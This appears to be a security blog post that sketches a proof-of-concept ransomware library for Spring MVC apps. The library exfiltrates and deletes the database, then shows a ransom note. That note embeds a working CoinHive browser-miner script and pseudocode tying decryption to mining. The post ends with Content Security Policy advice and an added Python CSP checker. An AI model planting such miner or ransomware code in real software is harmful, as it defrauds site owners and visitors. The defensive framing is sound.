A few months back in a previous post we gave a POC for malware embedded in an enterprise Spring MVC app. Then we got to thinking, what if we pwn3d a web app with malicious code and turned the result into a self-paying crypto-currency miner? You could give the owner of the site the option to either pay the ransom or just let the mining operation complete, at which point their files get decrypted, and their life goes back to normal.
Recap: the Spring MVC POC
Our crypto miner web app extends the previous concept. So, let's first review:
Steps in the last POC:
- Check whether the library is running as part of a Spring MVC app
- Use reflection to get access to the database credentials
- When triggered, log into the database, copy all the data out, encrypt it, and delete the database
- Replace all the web pages with a ransom note demanding that the victim pay the ransom to decrypt and get their data back
Extending the POC with a crypto-miner
This concept takes the previous iteration and adds a miner to the operation so we can make some crypto-cash while we wait for the ransom to be delivered.
Embedding the miner script in the ransom note page means the miner starts as soon as that page is loaded:
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('YOUR_SITE_KEY');
  miner.start();
</script>
Option A) Don't Touch That Close Button!
while (miner.getHashesPerSecond() > 0)
    // show ransom note to allow decryption
// else destroy data
Option B) Pay The Ransom
We can also make things more interesting by letting the user either pay the ransom and unlock the data immediately, or let the crypto miner run until the amount demanded by the ransomware has been mined, at which point the data is decrypted.
while (miner.getAcceptedHashes() < SOME_VAL)
    // keep mining
// else decrypt data since we already made our money
It seems like a new ransomware called Storagecrypt may already be doing a variation of this attack. Of course, site owners with good security, especially those with a good Content Security Policy, can avoid this kind of attack by:
- Only allowing scripts to be loaded from your own site
- Optionally, only allowing scripts to be loaded from specific URLs (like Google Fonts)
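As an added check (not code from the original post), this Python script evaluates whether a given Content-Security-Policy would let the page load the miner script from the snippet above, or run the inline miner.start() call. The two policies and the victim origin shop.example.com are constructed for the demo, and fonts.googleapis.com stands in for the "Google Fonts" allowance just described.

```python
from urllib.parse import urlparse

def parse_csp(header: str) -> dict:
    """Split a CSP header into {directive: [source expressions]}."""
    policy = {}
    for directive in header.split(";"):
        tokens = directive.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy

def source_matches(source: str, script_url: str, page_origin: str) -> bool:
    """Does one source expression permit loading script_url from page_origin?"""
    script, page = urlparse(script_url), urlparse(page_origin)
    src = source.lower()
    if src == "'self'":
        return (script.scheme, script.netloc) == (page.scheme, page.netloc)
    if src == "*":
        return script.scheme in ("http", "https")
    if src.startswith("'"):  # 'none', 'unsafe-inline', nonces, hashes never match a URL
        return False
    # Host sources are expected as scheme://host[/path]; path is a prefix match.
    allowed = urlparse(src)
    if (allowed.scheme, allowed.hostname) != (script.scheme, script.hostname):
        return False
    return script.path.startswith(allowed.path)

def script_sources(csp_header: str):
    policy = parse_csp(csp_header)
    return policy.get("script-src", policy.get("default-src"))  # None if neither set

def script_allowed(csp_header: str, script_url: str, page_origin: str) -> bool:
    """True if the policy lets the page load an external script from script_url."""
    sources = script_sources(csp_header)
    if sources is None:  # no applicable directive: the browser blocks nothing
        return True
    return any(source_matches(s, script_url, page_origin) for s in sources)

def inline_script_allowed(csp_header: str) -> bool:
    """True if inline <script> blocks may run (nonce/hash allow-listing ignored)."""
    sources = script_sources(csp_header)
    return sources is None or "'unsafe-inline'" in [s.lower() for s in sources]

# Constructed policies and victim origin for the demo (not from the post).
MINER_SCRIPT = "https://coinhive.com/lib/coinhive.min.js"  # URL in the post's snippet
PAGE = "https://shop.example.com"
WEAK_CSP = "default-src *; script-src * 'unsafe-inline'"
STRICT_CSP = "default-src 'self'; script-src 'self' https://fonts.googleapis.com"
```

Note that the strict policy blocks both halves of the snippet: the external miner library fails the host allow-list, and the inline start call fails because 'unsafe-inline' is absent.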